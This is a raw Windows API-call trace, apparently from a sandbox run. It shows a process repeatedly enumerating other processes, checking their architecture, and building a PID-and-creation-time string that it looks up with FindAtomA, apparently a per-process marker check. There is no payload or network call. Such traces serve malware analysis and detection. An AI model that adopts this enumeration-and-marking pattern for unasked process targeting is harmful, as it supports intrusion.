	[0079.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0079.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0079.121] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.121] CloseHandle (hObject=0x224) returned 1
	[0079.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0079.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0079.122] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.122] CloseHandle (hObject=0x224) returned 1
	[0079.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0079.122] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.122] CloseHandle (hObject=0x224) returned 1
	[0079.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0079.122] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.122] CloseHandle (hObject=0x224) returned 1
	[0079.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0079.122] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.122] CloseHandle (hObject=0x224) returned 1
	[0079.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0079.122] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.122] CloseHandle (hObject=0x224) returned 1
	[0079.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0079.123] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.123] CloseHandle (hObject=0x224) returned 1
	[0079.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0079.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0079.123] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.123] CloseHandle (hObject=0x224) returned 1
	[0079.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0079.123] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.123] CloseHandle (hObject=0x224) returned 1
	[0079.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0079.123] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.123] CloseHandle (hObject=0x224) returned 1
	[0079.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0079.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0079.123] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.123] CloseHandle (hObject=0x224) returned 1
	[0079.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0079.123] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.124] CloseHandle (hObject=0x224) returned 1
	[0079.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0079.124] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.124] CloseHandle (hObject=0x224) returned 1
	[0079.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0079.124] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.124] CloseHandle (hObject=0x224) returned 1
	[0079.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0079.124] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.124] CloseHandle (hObject=0x224) returned 1
	[0079.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0079.124] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.124] CloseHandle (hObject=0x224) returned 1
	[0079.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0079.124] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.124] CloseHandle (hObject=0x224) returned 1
	[0079.124] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0079.124] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.124] CloseHandle (hObject=0x224) returned 1
	[0079.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0079.125] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.125] CloseHandle (hObject=0x224) returned 1
	[0079.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0079.125] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.125] CloseHandle (hObject=0x224) returned 1
	[0079.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0079.125] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.125] CloseHandle (hObject=0x224) returned 1
	[0079.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0079.125] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.125] CloseHandle (hObject=0x224) returned 1
	[0079.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0079.125] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.125] CloseHandle (hObject=0x224) returned 1
	[0079.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0079.125] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.125] CloseHandle (hObject=0x224) returned 1
	[0079.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0079.126] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.126] CloseHandle (hObject=0x224) returned 1
	[0079.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0079.126] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.126] CloseHandle (hObject=0x224) returned 1
	[0079.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0079.126] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.126] CloseHandle (hObject=0x224) returned 1
	[0079.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0079.126] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.126] CloseHandle (hObject=0x224) returned 1
	[0079.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0079.126] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.126] CloseHandle (hObject=0x224) returned 1
	[0079.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.126] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.126] CloseHandle (hObject=0x224) returned 1
	[0079.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.127] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.127] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0079.127] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0079.127] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0079.127] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.127] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0079.127] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.127] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0079.127] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0079.127] CloseHandle (hObject=0x224) returned 1
	[0079.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0079.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0079.128] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.128] CloseHandle (hObject=0x224) returned 1
	[0079.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0079.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0079.128] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.128] CloseHandle (hObject=0x224) returned 1
	[0079.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0079.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0079.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0079.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0079.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0079.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0079.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0079.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0079.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0079.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0079.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0079.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0079.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0079.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0079.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0079.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0079.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0079.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0079.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0079.199] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.199] CloseHandle (hObject=0x224) returned 1
	[0079.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0079.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0079.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0079.199] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.199] CloseHandle (hObject=0x224) returned 1
	[0079.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0079.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0079.200] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.200] CloseHandle (hObject=0x224) returned 1
	[0079.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0079.200] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.200] CloseHandle (hObject=0x224) returned 1
	[0079.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0079.200] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.200] CloseHandle (hObject=0x224) returned 1
	[0079.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0079.200] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.200] CloseHandle (hObject=0x224) returned 1
	[0079.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0079.200] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.200] CloseHandle (hObject=0x224) returned 1
	[0079.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0079.200] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.200] CloseHandle (hObject=0x224) returned 1
	[0079.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0079.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0079.217] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.217] CloseHandle (hObject=0x224) returned 1
	[0079.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0079.217] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.218] CloseHandle (hObject=0x224) returned 1
	[0079.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0079.218] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.218] CloseHandle (hObject=0x224) returned 1
	[0079.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0079.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0079.218] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.218] CloseHandle (hObject=0x224) returned 1
	[0079.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0079.218] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.218] CloseHandle (hObject=0x224) returned 1
	[0079.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0079.218] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.218] CloseHandle (hObject=0x224) returned 1
	[0079.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0079.218] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.218] CloseHandle (hObject=0x224) returned 1
	[0079.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0079.218] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.219] CloseHandle (hObject=0x224) returned 1
	[0079.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0079.219] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.219] CloseHandle (hObject=0x224) returned 1
	[0079.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0079.219] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.219] CloseHandle (hObject=0x224) returned 1
	[0079.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0079.219] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.219] CloseHandle (hObject=0x224) returned 1
	[0079.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0079.219] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.219] CloseHandle (hObject=0x224) returned 1
	[0079.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0079.219] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.219] CloseHandle (hObject=0x224) returned 1
	[0079.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0079.219] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.219] CloseHandle (hObject=0x224) returned 1
	[0079.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0079.220] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.220] CloseHandle (hObject=0x224) returned 1
	[0079.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0079.220] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.220] CloseHandle (hObject=0x224) returned 1
	[0079.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0079.220] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.220] CloseHandle (hObject=0x224) returned 1
	[0079.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0079.220] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.220] CloseHandle (hObject=0x224) returned 1
	[0079.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0079.220] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.220] CloseHandle (hObject=0x224) returned 1
	[0079.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0079.220] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.220] CloseHandle (hObject=0x224) returned 1
	[0079.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0079.220] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.220] CloseHandle (hObject=0x224) returned 1
	[0079.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0079.221] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.221] CloseHandle (hObject=0x224) returned 1
	[0079.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.221] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.221] CloseHandle (hObject=0x224) returned 1
	[0079.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0079.221] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.221] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0079.221] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0079.221] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0079.221] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.222] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0079.222] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0079.222] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0079.222] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0079.222] CloseHandle (hObject=0x224) returned 1
	[0079.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0079.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0079.222] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.222] CloseHandle (hObject=0x224) returned 1
	[0079.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0079.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0079.222] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.222] CloseHandle (hObject=0x224) returned 1
	[0079.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0079.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0079.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0079.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0079.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0079.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0079.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0079.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0079.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0079.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0079.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0079.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0079.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0079.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0079.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0079.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0079.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0079.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0079.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0079.321] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.321] CloseHandle (hObject=0x224) returned 1
	[0079.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0079.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0079.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0079.321] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.321] CloseHandle (hObject=0x224) returned 1
	[0079.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0079.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0079.321] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.321] CloseHandle (hObject=0x224) returned 1
	[0079.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0079.321] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.321] CloseHandle (hObject=0x224) returned 1
	[0079.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0079.321] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.321] CloseHandle (hObject=0x224) returned 1
	[0079.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0079.322] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.322] CloseHandle (hObject=0x224) returned 1
	[0079.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0079.322] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.322] CloseHandle (hObject=0x224) returned 1
	[0079.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0079.322] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0079.322] CloseHandle (hObject=0x224) returned 1
	[0079.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
